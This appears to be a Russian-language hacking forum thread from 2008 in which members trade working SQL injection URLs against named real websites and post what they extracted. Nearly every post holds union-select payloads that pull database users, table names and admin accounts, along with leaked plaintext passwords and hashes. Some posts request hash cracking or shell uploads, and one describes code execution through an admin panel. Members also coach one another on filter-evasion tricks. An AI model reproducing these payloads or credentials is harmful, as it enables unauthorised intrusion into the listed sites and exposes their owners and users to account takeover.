http://mobilgamez.ru/ctlg.php?xn=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(v ersion(),0x3a,user(),0x3a,database()),13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51--
version() - 5.0.22
user() - admin_mobilgamez@89.188.106.170
database() - admin_mobilgamez
Вывод производится в title.
Сервер:
nginx/0.6.31
Админка какая-то странная, по идее тут:
http://mobilgamez.ru/admin , ввел наугад логин/пароль admin/admin ... Подойти вроде подошло, но ошибку 500 показало... Вот так вотЪ :)
http://www.treviso.aci.it/rubrique.php?id_rubrique=10&tessera=-12+union+select+1,2/*
version 4.1.14
DBName ac_nazionale
Username ac_nazionale@localhost
http://www.vocecamuna.it/sito/index.php?subgroupid=65&groupid=-20+union+select+1,2,3,4,5,6,7,8,9,10/*
version 4.0.18
user vallecamonica_db@localhost
DBName vallecamonica_db
Cennarios
20.08.2008, 16:23
http://cfimmobilier.ch/voirPhoto.php?id=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6,7,8,9+from+admin_users+limit+1,10/*
login:wrackweb password:*3C7033F3D7FABB8B62C78C38542F390CC2C969D5
http://www.cfimmobilier.ch/admin/
http://inforce.com.ua/index.php?mi=1&detail=0%20union%20select%201,2,3,4
USER() inforce_inforce@apollo
DATABASE() inforce_inforce
VERSION() 4.1.22-log
можно еще что то зделать?
подскажите в пм, если не трудно.
Cennarios
20.08.2008, 20:25
http://www.stoubos.gr/car_en.php?id=-1+union+select+concat(0x3a3a,username,0x3a3a,passw ord),2,3,4,5,6,7,8,9,10,11,12,13,14+from+stoub0s_c ars.users+limit+0,1
login: stoub0s pass: st9845st
http://stoubos.gr/admin
Зы: Админим буржуйский шоп....
http://www.zaistinu.ru/admin - админка
http://www.zaistinu.ru/articles/?sid=949+union+select+login+from+admins/*
login=vma || login=editor1
password выдавать не хочет, зараза.
version = 5.0.32-Debian_7etch6-log
Кто ломанет, отпишетсь, пожалуйста.
S0ulVortex
21.08.2008, 00:02
инет магазин
http://www.edenbio.com/garden/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*
http://www.edenbio.com/administrator
ыыы оказалось я не 1 :)
S0ulVortex
21.08.2008, 00:23
карчое нашапке сайта написано так "морская среда и безопасность для европейской области"
http://mersea.santateresa.enea.it/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*
-=Static=-
21.08.2008, 02:22
http://www.zaistinu.ru/admin - админка
http://www.zaistinu.ru/articles/?sid=949+union+select+login+from+admins/*
login=vma || login=editor1
password выдавать не хочет, зараза.
version = 5.0.32-Debian_7etch6-log
Кто ломанет, отпишетсь, пожалуйста.
vma:091
Borey:ltqytrf1734
Alexander:78Borey
oleg:z9723011265
vma:091
Borey:ltqytrf1734
Alexander:78Borey
oleg:z9723011265
Спасибо, я понял, пароль на vma совпадал с sid и он не высвечивался.
Cennarios
21.08.2008, 14:09
http://www.bridesathotbobbins.co.uk/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a ,password,0x3a3a)+from+accounts/*
login:admin password:stolave22
Админим.....
Cennarios
21.08.2008, 16:05
Иногда из-за идиотизма одного страдают многие.......
Не успел запостить http://www.bridesathotbobbins.co.uk/
Как, совершенно ненароком, мой взор пал на маааханькую приписочку снизу... А именнно
Powered by Qwicsite Pro
Да,да дружок! Именно там где мы логинимся вместо нерадивого админа. Зайдя на сайт этой чудной смски, я с удивлением обнаружил что баг то не местного разлива, а именно роднной баг СМС и исправлть его никто нигде не брался!!!
http://www.qwic.co.uk/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a ,password)+from+accounts/*
Login:admin Pass:stolave22
Там есть подраздельчик Qwicsite Pro websites admin, заходим туда и админим сразу всех их клиентов!!! А их не много не мало - 54 штуки!!!!
http://www.farmnet.eu/wcr/index.php?page=news/detail&newsID=11+and+1=2+union+select+concat_ws(0x3a,user (),version(),database()),2,3,4,5,6,7,8,9,10,11,12, 13,14,15/*
user() = eu-info@localhost
version() = 5.0.27
database() = db02
http://www.farmnet.eu/wcr/index.php?page=log-in
wcr-team:maize
http://www.hotels-piter.spb.ru/pages_piter.php?idleft=-4+union+select+concat(login,7,password)+from+users
Только ХЗ от чего пароль, к админке не подходит :confused: !
Ну может кому интерестно пороет найдет, если найдете отпишитесь, любопытно !
Cennarios
21.08.2008, 22:15
http://msracing.co.uk/category.php?c_id=1)+union+select+1,2,concat(0x3a3 a,u_username,0x3a3a,u_password),4+from+users/*
http://msracing.co.uk/admin/
login:msrcng06 pass:msrcng2006
http://www.breitbart.com/print.php?id=D8QRMCU00%27+union+select+1,2,3,4,5,6 ,7,8,9,0,version(),2/*
4.1.20-log
Elephant
22.08.2008, 00:38
Заметьте, проект САМЫЙ крупный который посвящён серии GTA
http://gta.com.ua/file_sa_details.phtml?id=59'
Заметьте, проект САМЫЙ крупный который посвящён серии GTA
http://gta.com.ua/file_sa_details.phtml?id=59'
Раскрутил бы до конца что ли...
http://gta.com.ua/file_sa_details.phtml?id=999+union+select+1,2,3,co ncat_ws(0x3a3a,username,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+admin/*
Версия: 4.
Login:admin
Password hash:2IsfJILPkOJ2 (DES??)
http://gta.com.ua/admin -> Access Denied, потому никакого смысла нема. Разве что на форуме стоит ipb 2. Можно из for_members_converge вытянуть соль и хэшик.
http://www.fbmbmx.com/news.php?newsid=1296+and+1=2+union+select+1,concat _ws(0x3a,user(),version(),database()),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
user() = fbmbmx@localhost
version() = 4.1.21-log
database() = fbmbmx
admins
name:password
mike:erb9768
john:lee7124
steve:crandall4776
tom:blyth24
mikefixed:erb9768
http://www.planeta-lv.com/index_flash.php?page=1&sub=1'+union+select+1,2,3,4,5,6,7,8,TABLE_NAME,0,1 ,2,3+FROM+INFORMATION_SCHEMA.TABLES/*
планета
Вот инъект на порносайте, интересно конечно в админку было бы влезть, но соленый хэш :(
И не известно как соленый, да еще соль похоже хэшированая, а где чистая соль лежит не нашел еще !
http://novoporn.com/index.php?action=image&id=-16323+union+select+1,concat(id,char(58,58,58),logi nname,char(58,58,58),password,char(58,58,58),salt, char(58,58,58),title,char(58,58,58),firstname,char (58,58,58),lastname,char(58,58,58),email,char(58,5 8,58),inactive),3+from+cfw_auth_login
name:::pass:::salt
admin:::32d22edc834dbe06bef10ffb7cb148e1:::b7f4cf8 29896e1ccbfbc63c934077c6c
Cennarios
23.08.2008, 05:04
Китайский банннер-эксчендж
login:mintruder pass:django1'
http://www.banner4banner.ch/view.php?e=1&t=_blank&c=i&b=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,20/*
в 0 лимите лежит админ, но не брутится сволота... =)
А какой запрос для просмотра баз данных, если не секрет?-1+union+select+111,222,333,table_schema,555,666+fr om+information_schema.tables+where+table_name=0x75 73657273
http://www.nofollow.ru/?page=articles&artcat=23&artid=1955+union+select+1,2,concat(username,0x3a3a ,password),3,5,6+from+user/*
Админка: http://www.nofollow.ru/_admin_
Но видимо там .htpassword или как там его :(
http://bukvoed.ru/index.php?page=freec&act=reada&qid=4386+and+4386=-1+union+select+1,2,3,concat(fio,0x3a,email,0x3a,pw d),5+from+be_users/*
фио-мыло-пасс
странная у них система юзеров :/
http://www.asud.net/Iniziative/iniziativa.php?in=1%20UNION%20SELECT%201,concat_ws (0x3a,version(),database(),user()),3,4,5,6,7,8/*
4.1.22-standard-log:asud_net_2007_cv:GDM925_claudio@81.88.49.12
3
4
7
Подсобите в админку попасть ?
http://www.emirate.ru/cgi-bin/full_details.cgi?&id_tourist=21852&country=oae&id=-148+union+select+1,2,3,4,5,6,7,concat_ws(%27:%27,i d,name,password,status),9,10,11,12,13+from+_2.main _users--
Разрешено чтение файлов, но прочесть кроме /etc/passwd ниче не смог,
разрешена запись, но не найти директорию.
Есть пароли но ХЗ где админка !
такая вот тема :confused:
-=Static=-
24.08.2008, 00:57
Подсобите в админку попасть ?
http://www.emirate.ru/cgi-bin/full_details.cgi?&id_tourist=21852&country=oae&id=-148+union+select+1,2,3,4,5,6,7,concat_ws(%27:%27,i d,name,password,status),9,10,11,12,13+from+_2.main _users--
Разрешено чтение файлов, но прочесть кроме /etc/passwd ниче не смог,
разрешена запись, но не найти директорию.
Есть пароли но ХЗ где админка !
такая вот тема :confused:
Там может и не быть админки конкретно у этого сайта. Я так понимаю что база к которой он привязан общается еще с десятком сайтов. Или же просто криворукий одмин навставлял 10000000 движков таблиц и всякой такой хрени, потому как там оч много баз и таблиц...
http://www.emirate.ru/subscribe.php?&sub=-25+uni on+selec t+1,table_name,3+from+information_schema.tables/* - Это для таблиц
http://www.emirate.ru/subscribe.php?&sub=-25+uni on+sele ct+1,table_schema,3+from+information_schema.tables/* - Это для имен Баз
Вот те линк на таблицы, дальше раскручивай сам, если есть желание.
Там даж вордпресс стоит =)
http://www.emirate.ru/subscribe.php?&s ub=-25+union+select+1,option_na me,option_value+from+wordpress.wp_options/*
_http://smart-journeys.com
Кароч если подрочить, можешь много всякого там накрутить)))
Удачи. Если че интересного найдешь отпишись. Интересно. а самому ковырять времени нету)
Shaitan-Devil
24.08.2008, 11:10
http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-41+union+select+1,2,unhex(hex(version())),4/*
Версия 4,но мне повезло
http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-41+union+select+unhex(hex(password)),2,unhex(hex(u ser)),4+from+mysql.user/*
root: 066bc62049564980
Пополним коллекцию:
http://www.svadba.tu2.ru/
http://www.svadba.tu2.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user,0 x3a,database())--
version() - 5.0.51a
user() - logsvadba6@localhost
database() - logsvadba6
Достаем хэш админа:
http://www.svadba.tu2.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,passwor d,0x3a,usertype)+from+jos_users--
username : pass(md5) : salt
admin : 589ffec19b0ce895974aec9a5425e603 : S6L9oPNyOuyrzK9d
http://www.unioneconsulenti.it/article.php?sid=1%20UNION%20SELECT%201,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9/*
5.0.32-Debian_7etch1-log:unioneconsulenti:userconsulenti@localhost
http://www.ipodhacks.com/article.php?sid=1%20UNION%20SELECT%201,concat_ws(0 x3a,version(),database(),user()),3,4,5,6,7,8,9,10, 11/*
4.0.27-standard:ipodhack_mains
Ну и я немного ;) :
http://www.flirtanica.ru/articles1.php?id=-262+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user())/*
4.1.22:wwwflirtanicaru:flirtani@localhost
Shaitan-Devil
24.08.2008, 13:26
http://www.barcelo.edu.ar/vernoticia.php?id=-1+union+select+1,2,3,4,5,6,7,8,unhex(hex(user())), unhex(hex(version())),unhex(hex(database())),12,13 ,14,15,16,17,18,19,20,21/*
uv0001@localhost
4.1.14-log
uv0001_barcelo
Elvis000
24.08.2008, 14:39
АвиаБилеты в Москве
www.samoletom.ru
http://www.samoletom.ru/txt/spo.php?id=-59+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(USER(),0 x71),0x71),AES_DECRYPT(AES_ENCRYPT(version(),0x71) ,0x71),4,5,6,7,8,9,10/*
samoletom_db@localhost, 5.0.18-log
Таблички нормально перебираются
http://www.samoletom.ru/txt/spo.php?id=-59+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(TABLE_NA ME,0x71),0x71),3,4,5,6,7,8,9,10+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+16,1/*
MaSTeR GэN
24.08.2008, 14:42
avis-tour.ru
http://www.avis-tour.ru/?action=country&do=1&id=75&page_id=-37+UNION+SELECT+1,2,concat_ws(0x1,id,u_login,u_pas swd,u_name,u_active)+from+t_users%20limit%200,1/*
2�Julia�9410323�Julia�1
3�Admin�frekbyby935�Admin�0
Админка даж не представляю куда спряталось ;)
http://www.dubkow-muehle.de
http://www.dubkow-muehle.de/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user() ,0x3a,database())--
version() - 5.0.45
user() - ks0114@localhost
database() - ks0114db4
Достаем хэш админа:
http://www.dubkow-muehle.de/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,passwor d,0x3a,usertype)+from+jos_users--
login : pass(md5)
admin : 4518a2bcb56db571ef9002d9787b9365
Elephant
24.08.2008, 17:42
Раскрутил бы до конца что ли...
http://gta.com.ua/file_sa_details.phtml?id=999+union+select+1,2,3,co ncat_ws(0x3a3a,username,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+admin/*
Версия: 4.
Login:admin
Password hash:2IsfJILPkOJ2 (DES??)
http://gta.com.ua/admin -> Access Denied, потому никакого смысла нема. Разве что на форуме стоит ipb 2. Можно из for_members_converge вытянуть соль и хэшик.
Ракрутил с помощью ачатовца)))
А из форума ничё не выудил, а админка стоит огронечитель по IP, обидно блин! хотя взломать то можно, только сплоита под версию того форума я не нашел((((
Cennarios
25.08.2008, 03:39
Какая то шляпа..
http://www.abllm.se/?produkt=-1+union+select+1,2,3,4,5,6,7,concat(name,0x3a3a,pa ss),9,10,11,12,13,14,15,16,17,18+from+users+limit+ 4,1
login:goran pass:John6320 http://www.abllm.se/admin/
--------------------------------------------------------------------------------
Тоже Г*** непонятного назначения...
p://www.fraktsidan.se/read.php?id=-1+union+select+1,concat(username,0x3a3a,pass),3,4, 5,6,7,8,9,10,11+from+frakt_users+limit+0,1/*
login:Christer pass:3596
----------------------------------------------------------------
Туси!!!!(co Jaccass)
http://lanpartys.tv/artikel.php?y=&m=-1+union+select+1,concat(password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23+from+usr_w eb22_1.np_user+limit+0,1/*
login:admin pass:budsabong
Theplace.ru - трафистый сайт )
http://www.theplace.ru/news/news.php?id=-20142+union+select+1,2,3,table_name,5+from+informa tion_schema.tables/*
5 ветка, таблы..
http://www.theplace.ru/news/news.php?id=-20142+union+select+1,2,3,concat_ws(0x3a,nick,passw d),5+from+busers/*
юзеры.. походу от форума..
Mares.com
http://www.mares.com/events_detail.php?id=-45+union+select+1,2,3,4,table_name,6+from+informat ion_schema.tables+limit+16,1/*
5 версия.. таблы..
http://www.mares.com/events_detail.php?id=-45+union+select+1,password,3,4,username,6+from+use rs+limit+0,1/*
/admin
Fotohoster.ru
http://www.fotohoster.ru/index.php?module=gallery&category=1+or+1=1+and+substring(version(),1,1)=5
Vstile.ru
Мне домен понравился )
http://vstile.ru/?page_id=-33'+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18/*
http://www.er34.ru/
Единая Россия
http://www.er34.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user() ,0x3a,database())--
version() - 5.0.51a-log
user() - HST-79811-1@172.16.144.5
database() - HST-79811-1
Админ:
http://www.er34.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,passwor d)+from+jos_users--
login : password
amdin : 99be844677c58d723605ea5a1b558741
P.S: админский логин именно amdin, а не admin.
Расшифровать неполучилось(
Shaitan-Devil
25.08.2008, 09:33
Кто там не любит власть?
http://sao.mos.ru/?r=9_9&cat=16&type=28'
Поддомены
http://vdeg.sao.mos.ru/news_full.php?id=-16583+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5/*
4.1.12:sao@chicken:sao
dr.Pilulkin
25.08.2008, 10:37
http://www.marinersoftware.com/sitepage.php?page=-85+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22--
/home/marinersoftware/www/sitepage.php
marinersoftware@localhost
4.0.24
marinersoftware
http://www.contzert.ru/?page=order&id=99999+union+select+1,2,concat(0x3a3a,user(),0x3 a3a,version(),0x3a3a,database()),4,5,6,7,8,9,10,11/*
User: materdesk_masha@194.85.90.40
Version: 4.1.22
Database: materdesk_contzert
dr.Pilulkin
25.08.2008, 12:01
http://www.er34.ru/
hst-79811-1.admins
username
user_password
hst-79811-1.ibf_members_converge
converge_pass_hash
converge_pass_salt
hst-79811-1.sn_admins
admin_id
login
password
adminyug:5b16e49c4618bfc9b90665f38687af57
adminyug:5c8d3eee993f0bd5cde03ae5e018e5ac
yugrig:61686402abe82e0748c9fef76fb9f326
amdin:99be844677c58d723605ea5a1b558741
Хорошие пароли у него похоже :(
Shaitan-Devil
25.08.2008, 12:50
http://www.barcelo.edu.ar/vernoticia.php?id=1+union+select+1,2,3,4,5,6,7,8,u nhex(hex(version())),10,11,12,13,14,15,16,17,18,19 ,20,21/*
http://www.calcsandmore.com/hlavni.php3?PLANG=&rec=-1+union+Select+version()/*
http://www.dr-wellering.de/index.php?topid=675&groupid=3226&subgroupid=0&contentid=-7331+union+select++1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,unhex(hex(version())),24 ,25/*
http://www.infosecur.ru/out_e.php?id=-1018+union+select+1,2,3,unhex(hex(version())),5,6, 7,8,9,10,11,12,13/*
http://intelt.com/spb/hotel/?id=-1+union+select+1,version(),user(),4,5/*
http://www.unitedcorevision.com/id/print.php?type=A&zid=1+UNION+SELECT+1,2,3,concat_ws(0x3a,version(), database(),user()),5,6,7,8,9/*
5.0.27-standard:u3251_newuv:u3251_newuv@localhost
http://www.town.madison.wi.us/fire/calendar/index.php?display=event&id=-772+union+select+1,username,3,4,5,6,7,8,9,10,11,12 +from+ltw_usersv4/*&date=2008-Aug-12&returnto=month
version():5
Вот что я нарыл за 3 часа :D
http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12 +from+mysql.user/*
http://www.rdi-cam.com/pic.php?i=-33+union+select+1,2,3,4,5,6,7,8/*
--
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,2,3&limit=0
Список БД
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,table_name,3+from+INFORMATION_SC HEMA.TABLES&limit=0
--
http://www.merryhearts.org/news.php?id=-13+union+select+1,2,3,4,5,6,7/*
http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMAT ION_SCHEMA.TABLES+limit+25,1&te=0
http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMAT ION_SCHEMA.TABLES+limit+15,1&te=0
http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMAT ION_SCHEMA.TABLES+limit+16,1&te=0
Можете по перебирать таблицы используя limit+от 0,1 до непомню до скольки
:)
http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,3,3,4,5,6/*
дальше не могу :(
-------------
http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,4,5/*
Версия MySQL
http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,VERSION(),5/*
USER
http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,USER(),5/*
База Данных
http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,DATABASE(),5/*
----------------------------------
вот еще одна, только я не логаняю что дальше
http://www.theenemy.com/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11/*
--------------------------------
http://post-dvor.ru/news.php?id=-13+union+select+1,2,3,4/*
версия MySQL 4.0.27-log 3
--------------------------
http://www.budd-pni.com/news.php?ID=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24/* :confused:
--------------------------
:D
http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,3,3,4,5,6/*
дальше не могу :(
Давай поможем :)
http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,unhex(hex(version())),3,4,5,6/*
version() - 4.1.15-standard
user() - tartanarmy_cms@server88-208-202-138.live-servers.net
database() - tartanarmy_cms :)
Также докрутим
Таблички:
http://www.rdi-cam.com/pic.php?i=-33+union+select+1,table_name,3,4,5,6,7,8+from+info rmation_schema.tables/*
и
http://www.rdi-cam.com/pic.php?i=-33+union+select+1,concat_ws(version(),user(),datab ase()),3,4,5,6,7,8/*
Все в твоих руках. Главное - пробовать :) Удачи ;)
Давай поможем :)
http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,unhex(hex(version())),3,4,5,6/*
........
спасибо :)
Вот еще SQL
http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,3,4,5,6,7--
-----------------
Таблица USERS
http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,table_name,4,5,6,7+from+INFORM ATION_SCHEMA.TABLES--
а как её просмотреть!? :confused:
потскажите и покажите пожалуйсто :)
Вот еще SQL
http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,3,4,5,6,7--
-----------------
Таблица USERS
http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,table_name,4,5,6,7+from+INFORM ATION_SCHEMA.TABLES--
а как её просмотреть!? :confused:
потскажите и покажите пожалуйсто :)
http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,name,4,5,6,7+from+users+limit+ 2,1--
и пересматривай лимитом :)
Добавляю:
e-mail админа: AtyLukes@aol.com
админка: http://www.mayorlukes.com/administrator/admin.php
еше кое-что интересное: Provided by DLG Results. Оф. сайт - http://www.dlgresults.com/
остаеца узнать пасс и залезть внутрь )...
USAkid, спасибо :)
Для спасибо есть плюсики :D :D :D
Для спасибо есть плюсики :D :D :D
:D
SeNaP
http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,3,3,unhex(hex(version())),5,6/*
версия 4.
http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,3,3,unhex(hex(concat_ws(0x3a,use r,password))),5,6+from+mysql.user/*
рут..
http://www.theenemy.com/news.php?id=-13+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
4 ver..
http://www.budd-pni.com/news.php?ID=-13+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24/*
sabe, а что вот это "unhex(hex" :) ?
вот нашол SQL инж
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,table_name,7+from+INFORM ATION_SCHEMA.TABLES+limit+19,1/* таблица "админ" , а как её вскрыть? :?
вот нашол SQL инж
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,table_name,7+from+INFORM ATION_SCHEMA.TABLES+limit+19,1/* таблица "админ" , а как её вскрыть? :?
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,column_name,7+from+INFOR MATION_SCHEMA.columns+where table_name='admin'/*
Если фильтрует кавычки, то используй вместо 'admin'
0x61646d696e. Это тоже самое, но в hex.
Как вариант можешь использовать SIPT 4.0, она делает всю рутинную работу.
Вот что получилось выдрать с базы
Getting Data from table admin from database eastbayt_store
Fields admin_groups_id:admin_firstname:admin_lastname:adm in_password
[0]:1:Sandy and Keven:Torres:065b34a51dd6819e14c87d580055ac42:e7
[1]:2:Customer:Service:a619003120892efc8cf3a44c85982a ec:44
http://www.bscs.k12.mi.us/website/index.php?subpage_id=94
User:website@localhost
Version:4.1.20 (((
Dbname:website
Ух ты... Сайт какого-то департамента образования
http://www.dosakh.ru/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd),6,7,8,9,10,11+from+mos_users--
admin:6672984060ab7eb061aa87cc089e761b (MD5)
расшифровать неполучилось(... Если кто сможет - отпишите :)
Идем далее:
http://www.dosakh.ru/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat_ws(version(),0x3a,us er(),0x3a,database()),6,7,8,9,10,11--
version() - 4.1.22
user() - dosakhru
database() - dosakhru@78.108.81.161
Зайдя на главную админки написано:
Разработка: Воробьев И.К.
Клева он сайты делает :D
4p3, чтот я не смог самостоятельно открыть таблицу admin
Shaitan-Devil
26.08.2008, 14:40
Смотри и учись юный падаван
065b34a51dd6819e14c87d580055ac42:e7- хэш админа нагел так
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,admin_password,7+from+ad min/*
Перебирая
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,column_name,7+from+INFOR MATION_SCHEMA.columns+where+table_name=0x61646d696 e+limit+5,1/*
Вот и все там кстати было мыло админа.
Cennarios
26.08.2008, 15:13
Турпортал.... Еб..м и наслаждаемся!
http://www.argoturas.lt/index.php?lng=en&action=page&id=-1+union+select+concat(0x3a3a,user_login,0x3a3a,use r_password),null,null+from+sys_user+limit+0,1
http://www.argoturas.lt/admin/
В админке, через файл конфига есть возможность выполнения php кода. -> дописываем, шелим и тп...
городишко кокойто..есть даже Wanted))
http://www.town.madison.wi.us/fire/calendar/index.php?display=event&id=-772
http://www.town.madison.wi.us/admin/
bill:RbILYS.h/oJD6
ltwcal:Rb6tYJLLkwwfM
gregory:RbccLVAoMKun.
bloom:Rbsf/mIEnfcgY
rose:Rbt1QrY2Izgkg:works4me
schwass:RbpTOUCiVsWOk
dr.Pilulkin
26.08.2008, 16:22
http://www.itcdc.com/explore.php?p=22+limit+0+union+select+1,2,concat_w s(char(58),username,password),4+from+itc.users+lim it+1,1/*
admin:bc5f1dcf127870a3d1acaf8a0ef99f11
чем можно загадирвать текст в hek ?
http://hack-shop.org.ru/tools-code-encode
SQL Hex + 0x | Path
Любителям "ЛЮДИ-Х"
http://www.xpg.us/cerebra/display.php?id=-1347+union+select+1,2,3,4,5,username,7,password,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,4 3,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59, 60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76 ,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,name +from+login+limit+1,1/*
login.php
но аплоадит только джпеги, правда особо не разбиралса...
================================================== ==============
http://www.lancsfirerescue.org.uk/lfrs/fire_stations/your_station.php?id=42
version 4.1.22-standard-log
User lancsfire@localhost
решил попробавать добить этот сайт, но
таблицу форума нашол
http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMAT ION_SCHEMA.TABLES+limit+70,1&te=0
а поюзать я её не могу :(
вот
http://ledi.ru/news.php?id=-13+union+select+1,2,3,column_name,5,6+from+INFOTMA TION_SCHEMA.COLUMNS+where+table_name=0x6962665f6d6 f64657261746f7273&te=0
:confused:
0x6962665f6d6f64657261746f7273 = ibf_moderators
--------------
если кто зделает, покажите?
Aac.ur.ru - Меня попросили проголосовать за одну девченку))
http://www.aac.ur.ru/?op=add_backet&id=6234&categ=99999+union+select+1,2,unhex(hex(version())) ,4,5,6,7,8,9,10,11,12,13/*
4 версия...
http://www.aac.ur.ru/?op=add_backet&id=6234&categ=99999+union+select+1,2,unhex(hex(concat_ws(0 x3a,user,password))),4,5,6,7,8,9,10,11,12,13+from+ mysql.user/*
рут..
SeNaP
http://ledi.ru/news.php?id=-13+union+select+1,2,3,unhex(hex(concat_ws(0x3a,nam e,member_login_key))),5,6+from+ibf_members+limit+0 ,1&te=0
sabe, можеш пояснить, вот это "unhex(hex" ? :)
для чего это нужно?
и откуда ты получил вот эту таблицу?
" member_login_key"
SeNaP
hex() - это конвертация стринга в хекс..
unhex() - обратная функция...
используем эту конструкцию вместе чтобы не было таких ошибок как у тебя ;)
member_login_key - это стандартное поле где хранятся пассы от IPB
Все читают книжки? xD
Издательство "Эксмо"
http://www.eksmo.ru/catalog/book?b=1'
http://www.eksmo.ru/catalog/book?b=61308+union+select+1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5/*
4.0.21-standard-log
Издательство "Народное"
http://literati.ru/list4.php?rub=1'
http://literati.ru/list4.php?rub=-1+union+select+1,2,3,4/*
4.1.22-log
А теперь после книжек идем на рыбалку :D
--------------
Базы ДанныХ
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,table_name,3+from+INFORMATION_SC HEMA.TABLES&limit=0
--------------
Таблицы в форуме
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,column_name,3+from+INFORMATION_S CHEMA.COLUMNS+where+table_name='phpbb_users'&limit=0
---------------
Юзеры форума
КЕШ(пароль не расшифрованный) = ЛОГИН
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,(concat_ws(0x3d,user_password,us ername)),3+from+phpbb_users&limit=0
----------------
Форум _http://www.flyfishinginnh.com/forum/
логин:admin
Пароль: 1 или brookie21
так как я по английскому не хрена не шарю :D
пороль 1 или brookie21
Логин: admin
-----------------
Кто сможет залить шел, отпишитесь пожалуйчто в ЛС ;)
SeNaP
admin;brookie21
но форум не тот что ты указал это булка. у тебя хеш от phpbb ищи phpbb дам шелл нету phpbb ищи в базе поля от vb +))))))))
Давайте посетим сайт футбольного клуба Анжи.
http://www.fc-anji.ru
http://www.fc-anji.ru/news.php?id=-341+union+select+1,concat_ws(version(),0x3a,user() ,0x3a,database()),3,4,5,6/*
version() - 4.1.22
user() - opendag@localhost
database() - wwwopendagru
Раскрытие пути:
/www/opendag/users/opendag-fcanji/www/htdocs/news.php
К information_schema и mysql.user доступа нету(
